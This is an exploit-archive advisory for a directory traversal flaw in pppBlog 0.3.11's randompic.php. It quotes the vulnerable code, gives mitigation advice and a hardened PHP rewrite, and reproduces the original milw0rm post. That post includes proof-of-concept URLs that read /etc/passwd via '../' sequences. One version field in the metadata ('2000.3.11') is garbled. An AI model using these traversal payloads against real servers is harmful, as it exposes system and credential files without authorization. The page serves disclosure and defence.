Vendor: pppBlog
By: JosS
CVSS: 7.5 (HIGH)
System File Disclosure
CWE: 22
Product Name: pppBlog
Affected Version From: 2000.3.11
Affected Version To: 2000.3.11
Patch Exists: YES
Related CWE: N/A
CPE: pppblog
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: localhost
2008

pppBlog <= 0.3.11 (randompic.php) System File Disclosure Vulnerability

pppBlog version 0.3.11 and below is vulnerable to system file disclosure due to improper input validation: with register_globals enabled, the $files array used by randompic.php can be supplied by the client, and the selected entry is passed straight to readfile() without being checked against the intended image directory. An attacker can exploit this to read arbitrary files from the server. The vulnerable code is in randompic.php at lines 66-72. The PoC for this vulnerability is randompic.php?files[0]=[file] and randompic.php?files[0]=../../../../../../../../../../etc/passwd. This exploit was tested on localhost with register_globals = On.

Mitigation:

Disable register_globals so that $files cannot be populated from the request, and validate that any file randompic.php serves resolves to a path inside the configured image directory before calling readfile().
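A hardened replacement for the randompic.php logic quoted on this page, added here as an example and not pppBlog's own code: the candidate list is built with scandir() on the configured directory instead of being read from the request, and a realpath() containment check runs before readfile(). The $dir location and the helper names are assumptions.

```php
<?php
// Added example, not pppBlog's own code: a hardened version of the
// randompic.php logic quoted above. Assumption: $dir is the server-side
// image directory configured by the application. The candidate list is
// built from the filesystem rather than from $files in the request, so
// register_globals no longer gives a client control over the path.

function list_gifs(string $dir): array
{
    $out = [];
    foreach (scandir($dir) ?: [] as $name) {
        // scandir() yields bare names, but basename() is kept as a guard
        // so a "../" sequence can never survive if this list is ever
        // populated from elsewhere.
        if ($name !== basename($name)) {
            continue;
        }
        if (strtolower(pathinfo($name, PATHINFO_EXTENSION)) === 'gif'
            && is_file("$dir/$name")) {
            $out[] = $name;
        }
    }
    return $out;
}

function contained_path(string $dir, string $name): ?string
{
    // Defence in depth: resolve symlinks and ".." and confirm the result
    // is still inside $dir before readfile() ever sees it.
    $base = realpath($dir);
    $full = realpath("$dir/$name");
    if ($base === false || $full === false
        || strncmp($full, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null; // missing, or escaped the image directory
    }
    return $full;
}

$dir   = __DIR__ . '/images';            // assumed location
$files = list_gifs($dir);                // overwrites any request-supplied $files
$path  = $files ? contained_path($dir, $files[array_rand($files)]) : null;
if ($path === null) {
    http_response_code(404);
    exit;
}
header('Content-Type: image/gif');
header('Content-Transfer-Encoding: binary');
readfile($path);
```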

Exploit-DB raw data:

# pppBlog <= 0.3.11 (randompic.php) System File Disclosure Vulnerability
# url: http://sourceforge.net/projects/pppblog/
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://spanish-hackers.com
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purposes. Use it at your own risk.
# Author will not be responsible for any damage.
#
# In memory of rgod ;)

*Requirements: register_globals = On

vulnerable code in randompic.php at lines 66-72:
...
header("Content-Type: image/gif");
header("Content-Transfer-Encoding: binary");
if (is_array($files)){
    if (is_file($files[$randnum])){
        readfile("$dir/$files[$randnum]");
    }
}
...

poc[0] = randompic.php?files[0]=[file]
poc[1] = randompic.php?files[0]=../../../../../../../../../../etc/passwd

linked: http://milw0rm.com/exploits/1853 (pppBlog 0.3.8, thanks rgod).

tested on localhost with register_globals = On.

Hack0wn :D

# milw0rm.com [2008-11-03]